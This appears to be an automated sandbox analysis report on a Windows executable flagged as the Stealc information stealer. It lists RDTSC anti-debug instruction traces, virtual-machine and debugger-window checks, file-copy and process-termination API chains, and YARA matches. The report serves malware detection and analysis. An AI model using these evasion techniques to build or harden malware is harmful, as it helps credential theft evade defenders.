                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E5BC second address: D1E5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F60745321A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26CBC second address: D26CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31FD9 second address: D31FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31A3E second address: D31A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E077 second address: D3E08C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F60745321A6h 0x00000009 js 00007F60745321A6h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43224 second address: D43229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43229 second address: D4323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60745321AFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47A0F second address: D47A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47A15 second address: D47A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F61 second address: D48F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074F4F606h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F7D second address: D48F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F82 second address: D48F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BBC3 second address: D4BBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jc 00007F60745321A6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BA4D second address: D4BA53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BA53 second address: D4BA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BA5E second address: D4BA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E251 second address: D4E257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E257 second address: D4E25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E076 second address: D4E0B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60745321A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F60745321B9h 0x00000011 jmp 00007F60745321B8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E0B5 second address: D4E0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F6074F4F5FDh 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F6074F4F5F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D509D3 second address: D509DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6074F1C3E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D509DD second address: D509F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6074F52D56h 0x00000008 jp 00007F6074F52D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5081A second address: D5081F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56DF4 second address: D56DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56DF8 second address: D56E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6074F1C3EAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56E08 second address: D56E12 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6074F52D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5598A second address: D5598E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55AD4 second address: D55AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55AD8 second address: D55ADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55C55 second address: D55C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55C5E second address: D55C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55C62 second address: D55C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D5Eh 0x00000007 ja 00007F6074F52D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56041 second address: D56046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A352 second address: D5A357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7729D second address: D772B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6074F1C3F3h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79E8D second address: D79EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D60h 0x00000007 jnp 00007F6074F52D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A14 second address: D79A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A19 second address: D79A20 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A20 second address: D79A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007F6074F1C3E6h 0x0000000e jmp 00007F6074F1C3F0h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A45 second address: D79A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A4B second address: D79A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F6074F1C3E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A5A second address: D79A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8957E second address: D89582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89582 second address: D8959D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8959D second address: D895A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D895A2 second address: D895A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884A1 second address: D884B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6074F1C3F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884B6 second address: D884BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88647 second address: D8866B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F1C3F4h 0x00000009 popad 0x0000000a jmp 00007F6074F1C3EBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8866B second address: D8868D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6074F52D62h 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F6074F52D56h 0x00000010 jno 00007F6074F52D56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8868D second address: D88691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AB6 second address: D88ABB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88ABB second address: D88AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AC7 second address: D88AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 jc 00007F6074F52D56h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AE0 second address: D88AEA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6074F1C3ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C060 second address: D8C064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C064 second address: D8C06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C06A second address: D8C0E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6074F52D58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6074F52D58h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dh, 1Ah 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F6074F52D58h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 call 00007F6074F52D59h 0x0000004a jmp 00007F6074F52D61h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 pop eax 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C0E2 second address: D8C106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F1C3F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C106 second address: D8C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F6074F52D5Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jl 00007F6074F52D60h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C124 second address: D8C13D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F6074F1C3E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0505 second address: 53F0543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F6074F52D65h 0x00000013 xor ah, FFFFFFF6h 0x00000016 jmp 00007F6074F52D61h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE3F8 second address: CAE3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE3FC second address: CAE402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE402 second address: CAE40C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6074F1C3ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA66D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AFB59A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CCB65F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38865
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0081E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00811710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0081DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00823B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00823B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00824B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00824B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0081EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0081BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811160 GetSystemInfo,ExitProcess,0_2_00811160
                Source: file.exe, file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2092013993.0000000001654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2092013993.0000000001623000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37678
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37681
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37700
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37692
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37732
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37566
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00814610 VirtualProtect ?,00000004,00000100,000000000_2_00814610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00829BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829AA0 mov eax, dword ptr fs:[00000030h]0_2_00829AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00827690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00827690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00829790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_008298E0
                Source: file.exe, file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C@Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00857588 cpuid 0_2_00857588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00827D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00826BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00826BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_008279E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00827BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00827BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

